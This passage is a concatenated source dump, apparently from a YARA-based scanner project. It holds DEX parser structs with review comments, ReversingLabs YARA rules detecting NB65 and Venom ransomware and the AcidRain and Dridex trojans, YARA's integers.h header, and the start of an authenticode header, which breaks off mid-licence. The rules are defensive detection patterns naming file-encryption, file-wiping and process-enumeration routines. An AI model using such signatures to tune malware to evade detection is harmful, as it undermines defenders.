26 | uint32_t map_offset;
27 | uint32_t string_ids_size;
28 | uint32_t string_ids_offset;
29 | uint32_t type_ids_size;
30 | uint32_t type_ids_offset;
31 | uint32_t proto_ids_size;
32 | uint32_t proto_ids_offset;
33 | uint32_t field_ids_size;
34 | uint32_t field_ids_offset;
35 | uint32_t method_ids_size;
36 | uint32_t method_ids_offset;
37 | uint32_t class_defs_size;
38 | uint32_t class_defs_offset;
39 | uint32_t data_size;
40 | uint32_t data_offset;
41 | } dex_header_t;
42 |
// Entries of the string_ids / type_ids / proto_ids / field_ids / method_ids
// tables and the class_def items, as laid out in the file.
43 | typedef struct
44 | {
45 | uint32_t string_data_offset;
46 | } string_id_item_t;
47 |
// NOTE(review): in the DEX format string_data_item.utf16_size is a ULEB128,
// not a fixed uint32_t, so this struct cannot simply overlay file bytes the
// way the header can — confirm how dex.c reads it.
48 | typedef struct
49 | {
50 | uint32_t utf16_size;
51 | } string_data_item_t;
52 |
53 | typedef struct
54 | {
55 | uint32_t descriptor_idx;
56 | } type_id_item_t;
57 |
58 | typedef struct
59 | {
60 | uint32_t shorty_idx;
61 | uint32_t return_type_idx;
62 | uint32_t parameters_offset;
63 | } proto_id_item_t;
64 |
65 | typedef struct
66 | {
67 | uint16_t class_idx;
68 | uint16_t type_idx;
69 | uint32_t name_idx;
70 | } field_id_item_t;
71 |
72 | typedef struct
73 | {
74 | uint16_t class_idx;
75 | uint16_t proto_idx;
76 | uint32_t name_idx;
77 | } method_id_item_t;
78 |
79 | typedef struct
80 | {
81 | uint32_t class_idx;
82 | uint32_t access_flags;
83 | uint32_t super_class_idx;
84 | uint32_t interfaces_offset;
85 | uint32_t source_file_idx;
86 | uint32_t annotations_offset;
87 | uint32_t class_data_offset;
88 | uint32_t static_values_offset;
89 | } class_id_item_t;
90 |
// NOTE(review): class_data_item, encoded_field and encoded_method are
// ULEB128-encoded on disk; presumably dex.c decodes them into these
// fixed-width structs rather than overlaying them — confirm before relying on
// sizeof() of these types in a bounds check.
91 | typedef struct
92 | {
93 | uint32_t static_fields_size;
94 | uint32_t instance_fields_size;
95 | uint32_t direct_methods_size;
96 | uint32_t virtual_methods_size;
97 | } class_data_item_t;
98 |
99 | typedef struct
100 | {
101 | uint32_t field_idx_diff;
102 | uint32_t access_flags;
103 | } encoded_field_t;
104 |
105 | typedef struct
106 | {
107 | uint32_t method_idx_diff;
108 | uint32_t access_flags;
109 | uint32_t code_off;
110 | } encoded_method_t;
111 |
// Leading fixed part of a code_item; the instruction array of `insns_size`
// units follows it in the file.
112 | typedef struct
113 | {
114 | uint16_t registers_size;
115 | uint16_t ins_size;
116 | uint16_t outs_size;
117 | uint16_t tries_size;
118 | uint32_t debug_info_off;
119 | uint32_t insns_size;
120 | } code_item_t;
121 |
// One entry of the map list.
122 | typedef struct
123 | {
124 | uint16_t type;
125 | uint16_t unused;
126 | uint32_t size;
127 | uint32_t offset;
128 | } map_item_t;
129 |
// Parser state for one DEX file: the raw bytes and their length, the header
// (presumably pointing into `data`), and the YARA object the module populates.
130 | typedef struct _DEX
131 | {
132 | const uint8_t* data;
133 | size_t data_size;
134 | dex_header_t* header;
135 | YR_OBJECT* object;
136 | } DEX;
137 |
// Bounds check: true iff the `size` bytes starting at `pointer` lie inside
// [data, data + data_size). `size` is compared with data_size first, so the
// subtraction in the last term cannot wrap.
// NOTE(review): `dex` and `size` are used unparenthesised. struct_fits_in_dex
// passes sizeof(...), which is safe, but a compound `size` argument such as
// `a + b` would be cast as `(size_t) a + b` and subtracted as `- a + b`;
// parenthesising the macro parameters is the usual fix.
138 | #define fits_in_dex(dex, pointer, size) \
139 | ((size_t) size <= dex->data_size && (uint8_t*) (pointer) >= dex->data && \
140 | (uint8_t*) (pointer) <= dex->data + dex->data_size - size)
141 |
142 | #define struct_fits_in_dex(dex, pointer, struct_type) \
143 | fits_in_dex(dex, pointer, sizeof(struct_type))
144 |
145 | #pragma pack(pop)
146 |
147 | #endif
148 |
-------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.NB65.yara:
--------------------------------------------------------------------------------
1 | rule Win32_Ransomware_NB65 : tc_detection malicious
2 | {
3 | meta:
4 |
5 | author = "ReversingLabs"
6 |
7 | source = "ReversingLabs"
8 | status = "RELEASED"
9 | sharing = "TLP:WHITE"
10 | category = "MALWARE"
11 | malware = "NB65"
12 | description = "Yara rule that detects NB65 ransomware."
13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "NB65" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $encrypt_files = { 21 | E8 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 22 | C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 23 | C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 24 | C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 25 | C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ?? 75 ?? 33 C9 90 8A 44 0D ?? 26 | 0F B6 C0 83 E8 ?? 6B C0 ?? 99 F7 FB 8D 42 ?? 99 F7 FB 88 54 0D ?? 41 83 F9 ?? 72 ?? 27 | 8D 45 ?? 89 45 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 50 28 | ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D0 29 | 85 C0 75 ?? 33 F6 66 90 A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 30 | 8D 50 ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? FF B4 B5 ?? ?? ?? 31 | ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 32 | } 33 | 34 | $find_files = { 35 | 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 36 | 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 37 | 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 38 | 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? 39 | ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 40 | 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 41 | 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? 42 | ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 43 | } 44 | 45 | $enum_procs = { 46 | 33 C9 66 90 8A 84 0D ?? ?? ?? ?? 0F B6 C0 83 E8 ?? 8D 04 C0 99 F7 BD ?? ?? ?? ?? 8D 47 | 42 ?? 99 F7 BD ?? ?? ?? ?? 
88 94 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? A1 ?? ?? ?? ?? 8B 48 | 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 49 | ?? 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? 6A ?? E8 ?? ?? ?? ?? 50 | 83 C4 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? 8D 50 ?? 8B 8D ?? ?? ?? ?? 89 08 C7 02 ?? ?? 51 | ?? ?? 8B 4E ?? 89 48 ?? 8B 4E ?? 89 01 89 56 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 52 | 0F 85 ?? ?? ?? ?? 5B A1 ?? ?? ?? ?? 8B 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 53 | E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 ?? 57 FF D0 8B 4D ?? 5F 33 CD 5E E8 ?? ?? ?? 54 | ?? 8B E5 5D C3 55 | } 56 | 57 | condition: 58 | uint16(0) == 0x5A4D and 59 | ( 60 | $find_files 61 | ) and 62 | ( 63 | $enum_procs 64 | ) and 65 | ( 66 | $encrypt_files 67 | ) 68 | } -------------------------------------------------------------------------------- /src/exp/trojan/Linux.Trojan.AcidRain.yara: -------------------------------------------------------------------------------- 1 | rule Linux_Trojan_AcidRain : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "ACIDRAIN" 12 | description = "Yara rule that detects AcidRain trojan." 13 | 14 | tc_detection_type = "Trojan" 15 | tc_detection_name = "AcidRain" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $destroy_files_using_ioctls = { 21 | 55 89 E5 57 BF ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 7C 24 ?? 8B 45 ?? 89 04 24 E8 22 | ?? ?? ?? ?? 85 C0 89 C3 78 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 23 | 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D 24 | C3 8D 45 ?? BE ?? ?? ?? ?? 89 44 24 ?? 89 74 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 4D ?? 25 | 8B 55 ?? C7 45 ?? ?? ?? ?? ?? 85 C9 89 55 ?? 74 ?? 8D 75 ?? 8D B6 ?? ?? ?? ?? 8D BF 26 | ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ?? 27 | ?? ?? 
89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 01 D0 39 45 28 | ?? 89 45 ?? 77 ?? 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? C7 45 29 | ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 75 ?? EB ?? 31 C9 89 4C 24 ?? 8B 45 ?? 89 30 | 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 7C 24 ?? 89 1C 24 89 44 24 ?? E8 31 | ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 76 ?? B8 ?? ?? ?? ?? 89 74 24 32 | ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 33 | 24 E8 ?? ?? ?? ?? 80 7D ?? ?? 75 ?? A1 ?? ?? ?? ?? 89 7D ?? 89 45 ?? 8B 45 ?? 89 45 34 | ?? 8D 45 ?? 89 44 24 ?? B8 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ?? 35 | 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ?? 31 FF 89 1C 36 | 24 E8 ?? ?? ?? ?? 31 C0 89 44 24 ?? 89 7C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 75 ?? C7 37 | 45 ?? ?? ?? ?? ?? 85 F6 74 ?? 8D 75 ?? 8D 76 ?? B9 ?? ?? ?? ?? 89 74 24 ?? 89 4C 24 38 | ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 89 1C 24 39 | E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 40 | } 41 | 42 | $destroy_files_using_overwrite = { 43 | 55 89 E5 83 EC ?? 89 5D ?? 8B 5D ?? 8D 45 ?? 89 75 ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? 44 | C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 5D ?? 8B 75 45 | ?? 8B 7D ?? 89 EC 5D C3 46 | } 47 | 48 | $redundant_reboot_attempts = { 49 | C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? 50 | ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 51 | 84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 52 | 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 8D 76 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 53 | 24 E8 ?? ?? ?? ?? 31 D2 83 C4 ?? 89 D0 59 5B 5E 5F 5D 8D 61 ?? 
C3 54 | } 55 | 56 | condition: 57 | uint32(0) == 0x464C457F and 58 | ( 59 | $destroy_files_using_ioctls 60 | ) and 61 | ( 62 | $destroy_files_using_overwrite 63 | ) and 64 | ( 65 | $redundant_reboot_attempts 66 | ) 67 | } -------------------------------------------------------------------------------- /src/exp/trojan/Win32.Trojan.Dridex.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Trojan_Dridex : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "DRIDEX" 12 | description = "Yara rule that detects Dridex trojan." 13 | 14 | tc_detection_type = "Trojan" 15 | tc_detection_name = "Dridex" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $resolve_api_wrapper_1 = { 21 | 56 57 8B FA 8B F1 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FE ?? ?? ?? ?? 75 ?? 33 C0 5F 22 | 5E C3 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 8B CE E8 ?? 23 | ?? ?? ?? 85 C0 74 ?? 8B D7 ?? ?? ?? ?? E9 24 | } 25 | 26 | $resolve_api_wrapper_2 = { 27 | 57 53 8B FA 8B D9 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FB ?? ?? ?? ?? 74 ?? 8B CB E8 28 | ?? ?? ?? ?? 85 C0 74 ?? 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3 8B CB E8 ?? ?? ?? ?? 84 29 | C0 74 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB 30 | } 31 | 32 | $resolve_api_wrapper_3 = { 33 | 55 8B EC 57 8B 7D ?? 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 34 | ?? 56 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? 35 | 85 C0 75 ?? 5E 33 C0 5F 5D C2 ?? ?? 57 50 E8 ?? ?? ?? ?? 5E 5F 5D C2 36 | } 37 | 38 | $resolve_api_wrapper_4 = { 39 | 55 8B EC FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 ?? 56 40 | E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? 85 C0 41 | 74 ?? 5E 89 45 ?? 
5D E9 42 | } 43 | 44 | $find_first_file_snippet_1 = { 45 | 53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? [4-6] BA ?? 46 | ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A ?? 8D 56 ?? 47 | 52 53 51 FF D0 48 | } 49 | 50 | $find_first_file_snippet_2 = { 51 | 57 53 55 8B E9 33 C9 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? 52 | ?? 8B 18 E8 ?? ?? ?? ?? 8B C8 85 C9 74 ?? 33 D2 83 FB ?? 6A ?? 5B 8D 7D ?? 0F 4C DA 53 | 8B C2 53 52 52 57 0F 9D C0 50 FF 75 ?? FF D1 54 | } 55 | 56 | $find_first_file_snippet_3 = { 57 | 53 56 8B F1 33 DB 57 32 C9 89 5E ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 58 | 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 6A ?? 33 C0 83 FF ?? 59 0F 4C C8 8D 46 ?? 51 53 59 | 53 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2 60 | } 61 | 62 | $find_first_file_snippet_4 = { 63 | 53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? 8D 7B ?? 8D 64 | 5F ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A 65 | ?? 8D 56 ?? 52 53 51 CC C3 66 | } 67 | 68 | $find_first_file_snippet_5 = { 69 | 56 8B F1 32 C9 57 C7 46 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 70 | 8B 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 33 C0 B9 ?? ?? ?? ?? 83 FF ?? 0F 4C C8 51 50 71 | 50 8D 46 ?? 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? 
FF D2 72 | } 73 | 74 | condition: 75 | uint16(0) == 0x5A4D and 76 | ( 77 | any of ($resolve_api_wrapper_*) and 78 | any of ($find_first_file_snippet_*) 79 | ) 80 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Venom.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Venom : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "VENOM" 12 | description = "Yara rule that detects Venom ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Venom" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $setup_env = { 21 | 00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1B 22 | 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 23 | ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 07 6F ?? ?? 24 | ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 06 11 ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28 25 | ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 1F 26 | ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? 27 | 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ?? 72 28 | ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? 29 | ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? 30 | ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 20 ?? ?? ?? ?? 19 7E ?? ?? ?? ?? 19 16 7E ?? ?? ?? 31 | ?? 28 ?? ?? ?? ?? 0D 09 08 20 ?? ?? ?? ?? 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 28 32 | ?? ?? ?? ?? 00 2A 33 | } 34 | 35 | $find_files = { 36 | 00 00 00 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 00 00 08 72 ?? ?? ?? ?? 6F ?? 
?? 37 | ?? ?? 16 FE 01 0D 09 2C ?? 00 08 02 28 ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 00 07 38 | 17 58 0B 07 06 8E 69 32 ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 39 | ?? 00 11 ?? 02 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? 40 | 26 00 00 DE ?? 2A 41 | } 42 | 43 | $encrypt_files = { 44 | 00 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ?? 45 | ?? 18 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? 46 | ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 07 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 47 | 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F 48 | ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 17 6F ?? ?? ?? ?? 00 08 06 16 06 49 | 8E 69 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? 50 | ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? 51 | ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D 52 | ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 53 | DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 00 00 54 | DE ?? 26 00 00 DE ?? 00 DC 2A 55 | } 56 | 57 | condition: 58 | uint16(0) == 0x5A4D and 59 | ( 60 | $setup_env 61 | ) and 62 | ( 63 | $find_files 64 | ) and 65 | ( 66 | $encrypt_files 67 | ) 68 | } -------------------------------------------------------------------------------- /src/lib/include/yara/integers.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007-2015. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. 
Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/

#ifndef YR_INTEGERS_H
#define YR_INTEGERS_H


// Fixed-width integer types and limits. On toolchains that predate the
// standard header (old MSVC, old Borland) they are hand-defined from the
// compiler's __intN builtins; everywhere else the standard header is used.
#if (defined(_MSC_VER) && (_MSC_VER < 1600)) || \
    (defined(__BORLANDC__) && (__BORLANDC__ <= 0x0560))

#ifdef __cplusplus
extern "C"
{
#endif

// Microsoft Visual Studio C++ before Visual Studio 2010 or earlier versions
// of the Borland C++ Builder do not support the (u)int#_t type definitions
// but have __int# definitions instead

typedef __int8 int8_t;
typedef unsigned __int8 uint8_t;
typedef __int16 int16_t;
typedef unsigned __int16 uint16_t;
typedef __int32 int32_t;
typedef unsigned __int32 uint32_t;
typedef __int64 int64_t;
typedef unsigned __int64 uint64_t;

#ifdef __cplusplus
}
#endif


// Limits, written with MSVC's typed integer-literal suffixes (i8, ui16, ...)
// so each constant has the exact type of the corresponding typedef. The MIN
// values are spelled (-MAX - 1) because the magnitude of MIN is not itself a
// representable positive literal of that width.
#ifndef INT8_MIN
#define INT8_MIN (-127i8 - 1)
#endif

#ifndef INT16_MIN
#define INT16_MIN (-32767i16 - 1)
#endif

#ifndef INT32_MIN
#define INT32_MIN (-2147483647i32 - 1)
#endif

#ifndef INT64_MIN
#define INT64_MIN (-9223372036854775807i64 - 1)
#endif

#ifndef INT8_MAX
#define INT8_MAX 127i8
#endif

#ifndef INT16_MAX
#define INT16_MAX 32767i16
#endif

#ifndef INT32_MAX
#define INT32_MAX 2147483647i32
#endif

#ifndef INT64_MAX
#define INT64_MAX 9223372036854775807i64
#endif

#ifndef UINT8_MAX
#define UINT8_MAX 0xffui8
#endif

#ifndef UINT16_MAX
#define UINT16_MAX 0xffffui16
#endif

#ifndef UINT32_MAX
#define UINT32_MAX 0xffffffffui32
#endif

#ifndef UINT64_MAX
#define UINT64_MAX 0xffffffffffffffffui64
#endif

#else

// Other "compilers" and later versions of Microsoft Visual Studio C++ and
// Borland C/C++ define the types in the standard integer header.
// NOTE(review): the include target below was stripped in extraction; it must
// be the standard fixed-width integer header for the typedefs above to exist.

#include

#endif

#endif
-------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/structs.h: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN 